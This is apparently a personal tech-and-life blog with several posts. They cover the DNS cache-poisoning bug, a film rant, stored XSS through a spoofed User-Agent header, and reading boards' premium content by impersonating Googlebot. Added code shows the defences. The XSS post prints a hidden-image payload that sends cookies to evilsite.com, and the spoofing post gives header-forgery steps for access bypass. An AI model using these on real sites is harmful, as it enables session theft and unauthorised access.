Aug 01

Guess you know what DNS is?
If you don't know what it is ...
It's the Domain Name System. Every server is identified by a set of numbers (its IP address); to make them easier to remember we give them names (domain names), and for the internet to work, DNS maps those names to the numbers. (Duh, read Wikipedia for more info.)

For the techie folks who know what DNS is, you might have missed this news. There was a bug. It was just a bug while nobody knew about it. A few days ago it became a problem, because the bad people learned that it exists. A couple of days ago it became a major problem, because the bad people worked out how to tame the bug and exploit it. And today it's a frigging pain in the a**, because our dumb ISPs are not fixing their DNS servers.

Well, the bug is that bad people can manipulate DNS lookups (poison the answers your ISP's resolver hands out and caches). Which literally means, when you open Google.com, they can send you to Yahoo.com instead. Search engines need not be a problem, but if they manipulate the DNS of a bank ... the answer is ... somebody is gonna get hurt real badddddd.

So, I request you to check (@Doxpara) whether your DNS server is vulnerable to this bug or not, and if it is, change it to OpenDNS (208.67.222.222 and 208.67.220.220) and stay secure. As of today, I've tested BSNL and Airtel DNS servers (Chennai) and both of them are vulnerable. Guess we need to take a huge rod and shove it up someone's a** to make them fix their DNS servers so that we can stay secure.

For the extra-super-terrestrial technical folks, I need not tell you about this, but in case you missed it, check (@Securebits) the exploit that was released.
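A small offline illustration of the property such a check looks at, added here as an example and not the Doxpara tester's own code: whether a resolver reuses one UDP source port for every outbound query (so someone forging answers only has to guess the 16-bit transaction ID) or randomizes it. The log lines, addresses, ports and TXIDs below are constructed; in practice the observations come from an authoritative server you control that records the queries your ISP's resolver sends it.

```python
import math
import re
from collections import Counter

# Constructed sample: what an authoritative server you control might log when
# the resolver under test is made to look up five names. The addresses, ports
# and TXIDs are made up for this example.
FIXED_PORT_LOG = """
src=203.0.113.5:32768 txid=0x4c21
src=203.0.113.5:32768 txid=0x9e02
src=203.0.113.5:32768 txid=0x13f7
src=203.0.113.5:32768 txid=0xa0b5
src=203.0.113.5:32768 txid=0x77c8
"""

RANDOM_PORT_LOG = """
src=203.0.113.9:51233 txid=0x4c21
src=203.0.113.9:18472 txid=0x9e02
src=203.0.113.9:60711 txid=0x13f7
src=203.0.113.9:7209  txid=0xa0b5
src=203.0.113.9:44018 txid=0x77c8
"""

LINE_RE = re.compile(r"src=(\S+):(\d+)\s+txid=0x([0-9a-fA-F]+)")

def parse_log(text):
    """Return (source_port, txid) pairs from the log-style lines above."""
    pairs = []
    for line in text.strip().splitlines():
        m = LINE_RE.search(line)
        if m:
            pairs.append((int(m.group(2)), int(m.group(3), 16)))
    return pairs

def entropy_bits(values):
    """Empirical Shannon entropy of the observed values, in bits."""
    counts = Counter(values)
    n = len(values)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def forge_success_probability(search_space, forged_replies):
    """Chance that at least one of `forged_replies` spoofed answers matches both
    the TXID and the port, when the attacker has `search_space` equally likely
    (port, TXID) combinations to guess from."""
    return 1.0 - (1.0 - 1.0 / search_space) ** forged_replies

def assess(pairs):
    ports = [p for p, _ in pairs]
    txids = [t for _, t in pairs]
    distinct_ports = len(set(ports))
    # A forged reply must match the 16-bit TXID and the source port. With one
    # fixed port only the TXID protects the cache: 65536 possibilities. We can
    # only count the ports actually seen, so this is a lower bound on the real space.
    min_search_space = distinct_ports * 65536
    return {
        "distinct_ports": distinct_ports,
        "port_entropy_bits": entropy_bits(ports),
        "txid_entropy_bits": entropy_bits(txids),
        "min_search_space": min_search_space,
        # Odds for an attacker who fires 65536 forged replies at the resolver.
        "p_success_65536_forgeries": forge_success_probability(min_search_space, 65536),
        "verdict": "VULNERABLE: fixed source port" if distinct_ports == 1
                   else "source ports vary (%d distinct in sample)" % distinct_ports,
    }

if __name__ == "__main__":
    for name, log in (("fixed-port resolver", FIXED_PORT_LOG),
                      ("randomizing resolver", RANDOM_PORT_LOG)):
        print(name, assess(parse_log(log)))
```

With a fixed port, 65536 forged replies give the attacker roughly a 63% chance of landing one; five distinct ports in a sample of five already pushes that below 19%, and a resolver that really draws from the whole 16-bit port range makes a single race impractical.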

Jul 14

As usual, after watching a movie, rather than going back to my normal life, I started to analyze it. This time the analysis went even further, as the movie is one of the worst I've ever seen. Even after watching Rajeev Masand's review on CNN-IBN, where he clearly said the movie sucks, I shouldn't have watched it. But after watching it, I understood that the movie was not just crap but a very crappy copy of great movies I've seen.

The first half is set in 2008, where the movie sucked, but even then I could withstand it. It started to suck more when the hero reaches 2050, where I could see buildings, cars and robots copied from some Hollywood flicks but shown in a very intolerable way: one Darth Vader type of guy who makes Shivaji's Motte Boss type of sound from his head and uses the force to do some kind of blasts through his hands after a dance, his guys with laser guns and tube lights in their hands (well, the tube lights are supposed to look like lightsabers), a robot which tries to be part of iRobot, and one annoying teddy bear. Even if you manage to withstand all of them, the hero is a big problem, as he tries to be a copy of Hrithik.

After that movie, I wanted to try my own vision of the future, and it ended up very bad. I guess that flop movie had a better future than my thoughts. Anyway, later I renamed it from "my future" to a present-day alien planet, or how about an ant colony? If the background doesn't suit, how about a colony of IT ants which work on computers? Ah, never mind, I'm freezing the name as Alien Planet. I know that it's very crude, but come on, it's an alien planet and none of us know how one would look as of now :P

Jul 12

A shocking revelation. A good friend of mine was hiding something from us for a long time, and he finally revealed it in his blog post. This image will make it straightforward for you guys to understand what he was hiding from us.

Yes, I was as surprised as you guys are when I came to know this truth. But I 'was' happy to know that he was doing something he had loved since his childhood. He followed his force and became what he wanted to become.

But, being the guy who sits next to him throughout the day at work, I wanted to see his lightsaber skills. I was astonished by his skills when I saw them. Later I had to accept that he is far better at coding than at his saber skills. Well, you need to know the shocking reason.

(image: K without head) This is ME after the exhibition of his skills.

I request you all to sign this post as a petition for him to stop being a Jedi. Yoda, if you are reading this post: leave the Jedi council, ask him, you must.

Nov 18

Well, it's not just a funny way, but a very funny way. Neither through an HTTP GET nor an HTTP POST, but through a header. I hadn't read about this method of XSS until now, but seriously, it's silly and common. Webmasters usually read about the traffic to their websites, and Referer and User-Agent are very common headers they analyze to learn what kind of visitors they get and which site they are coming from.

I just spoofed my User-Agent header to "<script>alert(1)</script>", and when I looked at the stats page afterwards, guess what: my stats plugin wasn't sanitizing the input, and I got the alert window.

Now, going back to fix and report it. Be careful when looking at your stats (especially in WordPress). Rather than keeping a harmless alert, one can plant something like this:

<img
src="javascript:document.images[1].src=%22http://evilsite.com/cookie.php?c%3D+document.cookie;"
style=visibility:hidden />

The above code sends your cookie to the cookie.php page on evilsite.com, where the hacker can collect cookies with a very simple script and then become you just by using those cookies. This page has many vectors to use. It doesn't teach you how to use them, so if you really know what you have to do, you must already know this page.

Result: check your stats plugins and make sure that they are sanitizing (escaping on output) all the inputs, request headers included. Just don't trust them. They can be very dangerous. Finishing yet another episode of "How do THEY do it?"
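To make the fix concrete, here is an added example (not the plugin's code, nor WordPress's) of a tiny stats table built the careless way next to the same table with every visitor-controlled string entity-encoded on output, plus a scan for header values that carry markup, the kind of thing worth running over your own logs. The visitor records, addresses and User-Agent values are constructed; the two malicious ones are the alert payload from above and the cookie-stealing image written as a plain string.

```python
import html
from collections import Counter

# Constructed visitor records (client address, User-Agent header value) in the
# shape a stats plugin would keep. The last two are header values an attacker
# chose; the third is the one the post describes sending.
VISITS = [
    ("198.51.100.10", "Mozilla/5.0 (X11; Linux i686) Firefox/2.0.0.9"),
    ("198.51.100.11", "Mozilla/5.0 (X11; Linux i686) Firefox/2.0.0.9"),
    ("198.51.100.12", "<script>alert(1)</script>"),
    ("198.51.100.13",
     '<img src="javascript:document.images[1].src=\'http://evilsite.com/cookie.php?c=\'+document.cookie" '
     'style=visibility:hidden />'),
]

def top_user_agents(visits):
    """Most common User-Agent strings with their counts."""
    return Counter(ua for _, ua in visits).most_common()

def render_stats_vulnerable(visits):
    """The stats table as a careless plugin builds it: header text pasted straight into HTML.
    Whoever views this page runs whatever the visitor put in the header."""
    rows = "".join(f"<tr><td>{ua}</td><td>{n}</td></tr>"
                   for ua, n in top_user_agents(visits))
    return "<table>" + rows + "</table>"

def render_stats_safe(visits):
    """Same table; every visitor-controlled string is entity-encoded at the point
    it is written into HTML, so <, >, quotes and & can no longer form markup."""
    rows = "".join(f"<tr><td>{html.escape(ua, quote=True)}</td><td>{n}</td></tr>"
                   for ua, n in top_user_agents(visits))
    return "<table>" + rows + "</table>"

# Tokens that have no business in a real User-Agent; a cheap triage filter for logs.
SUSPICIOUS = ("<", ">", "javascript:", "onerror=", "onload=")

def suspicious_visits(visits):
    """Entries whose User-Agent carries markup or script."""
    return [(ip, ua) for ip, ua in visits
            if any(tok in ua.lower() for tok in SUSPICIOUS)]

if __name__ == "__main__":
    print(render_stats_vulnerable(VISITS))
    print(render_stats_safe(VISITS))
    print(suspicious_visits(VISITS))
```

Escaping belongs at the output stage, not at logging time: the raw header is still useful evidence in the log, and a value that is harmless in HTML may still be dangerous if the same stats end up in a CSV or a JavaScript chart.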

Nov 04

A funny feature (or mod) in vBulletin boards, and possibly in other message board scripts too. Have you ever faced this kind of situation?

  1. You need to download something
  2. You search in Google and you get some relevant results
  3. You click on that and you go to that site
  4. You see that the content (or the link to the download) which you needed is not shown; instead a message like "This part of the post is available only to registered users" appears.

I've faced that situation. These days, many message boards are coming up with a feature named "Premium Content" which is available only to registered users. But, in order to get traffic from search engines, their developers give an option to let search engines index the premium content. That is why you see a snippet of the content in Google but not when you go to the site.

Here is the tip. Either try to read it in the Google cache, or become Google yourself!!! How do you become Google? The answer is simple: spoof your User-Agent to Google's. These boards do nothing more than check your headers.

In Firefox, install an extension like User Agent Switcher or Modify Headers and change your user-agent to "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"; this makes the site think that you are Google.

In Firefox there is another option. In the address bar type "about:config", create a new string named "general.useragent.override" and set its value to "Googlebot/2.1 (+http://www.googlebot.com/bot.html)". Enter all the values without the quotes. This method broke my Gmail, as it stops loading JavaScript thinking that my browser is really incompatible. So, avoid this.

If you use IE, you'd better switch to Firefox for happy browsing. But if you don't want to switch and still want my tip, yeah, open the registry editor and do whatever you want at
HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent

After doing this, just check whether your settings are fine or not at UserAgent.org. If you want to try something different, telnet to the host on port 80 and send those headers yourself.

Instead of doing all this, you can prove that you are very boring by either registering at that site or checking whether there are any working logins at BugMeNot.com, logging in and reading the required information.

BTW, yet another tip which might be useful. An "X-Forwarded-For" header makes the server think that you are a proxy server for the IP address in the value of that header. In simple words, an IP address like "72.14.207.99" in an "X-Forwarded-For" header might make the server think that you are a proxy for "72.14.207.99" and save that IP in its log instead of yours. A stupid site like Rediff will give you its Rediff Abroad page, thinking it's so intelligent for grabbing your real location from that header, because 72.14.207.99 is an IP address of Google, located in CA, USA.
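Both tricks above, the Googlebot User-Agent and the X-Forwarded-For value, work for the same reason: the server trusts a header the client wrote. The following is an added example, not code from any board or from Rediff, showing each naive check next to a version that does not take the client's word for it: forward-confirmed reverse DNS for the crawler (the reverse-then-forward lookup Google recommends for verifying Googlebot) and X-Forwarded-For honoured only when the connection comes from your own proxy. The DNS records, the proxy range 10.0.0.0/8 and all addresses are constructed so the example runs offline.

```python
import ipaddress

# Constructed in-memory DNS data standing in for live reverse (PTR) and forward
# (A) lookups so the example runs offline; real code would call
# socket.gethostbyaddr() and socket.gethostbyname() instead.
PTR_RECORDS = {
    "66.249.66.1": "crawl-66-249-66-1.googlebot.com",
    "203.0.113.7": "host7.example.net",   # a visitor claiming to be Googlebot
}
A_RECORDS = {
    "crawl-66-249-66-1.googlebot.com": "66.249.66.1",
    "host7.example.net": "203.0.113.7",
}
GOOGLEBOT_UA = "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"

def is_googlebot_naive(headers):
    """What the boards in the post do: believe the User-Agent string."""
    return "Googlebot" in headers.get("User-Agent", "")

def is_googlebot_verified(headers, peer_ip, ptr=PTR_RECORDS, fwd=A_RECORDS):
    """User-Agent is only a hint. The peer's reverse DNS name must be under
    googlebot.com and must resolve forward to the same address, so a spoofed
    header from an unrelated host fails."""
    if "Googlebot" not in headers.get("User-Agent", ""):
        return False
    name = ptr.get(peer_ip)
    if name is None or not name.endswith(".googlebot.com"):
        return False
    return fwd.get(name) == peer_ip

# Address ranges of reverse proxies we operate (assumed); only they may set X-Forwarded-For.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]

def _is_trusted(addr_text, trusted):
    try:
        addr = ipaddress.ip_address(addr_text)
    except ValueError:
        return False
    return any(addr in net for net in trusted)

def client_ip_naive(headers, peer_ip):
    """The behaviour the post observed: record the header's address instead of the peer's."""
    xff = headers.get("X-Forwarded-For", "")
    return xff.split(",")[0].strip() if xff.strip() else peer_ip

def client_ip_verified(headers, peer_ip, trusted=TRUSTED_PROXIES):
    """Honour X-Forwarded-For only when the TCP peer is one of our own proxies,
    then walk the header from the right, skipping our proxies' entries; the
    first foreign hop is the client. Anything a client prepends sits left of
    that and is ignored."""
    if not _is_trusted(peer_ip, trusted):
        return peer_ip
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):
        if _is_trusted(hop, trusted):
            continue
        try:
            return str(ipaddress.ip_address(hop))
        except ValueError:
            return peer_ip  # not an address at all: fall back to the proxy's own
    return peer_ip

if __name__ == "__main__":
    spoofed = {"User-Agent": GOOGLEBOT_UA, "X-Forwarded-For": "72.14.207.99"}
    print(is_googlebot_naive(spoofed), is_googlebot_verified(spoofed, "203.0.113.7"))
    print(client_ip_naive(spoofed, "203.0.113.7"), client_ip_verified(spoofed, "203.0.113.7"))
```

The reverse-DNS check is not optional: the PTR record for an address is controlled by whoever owns the address, so a host could name itself whatever.googlebot.com in reverse; only the forward lookup back to the same address proves the name is real. Likewise X-Forwarded-For is only meaningful from the hop that your own proxy appended, which is why the walk starts from the right.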

Have Fun. Happy Spoofing ;)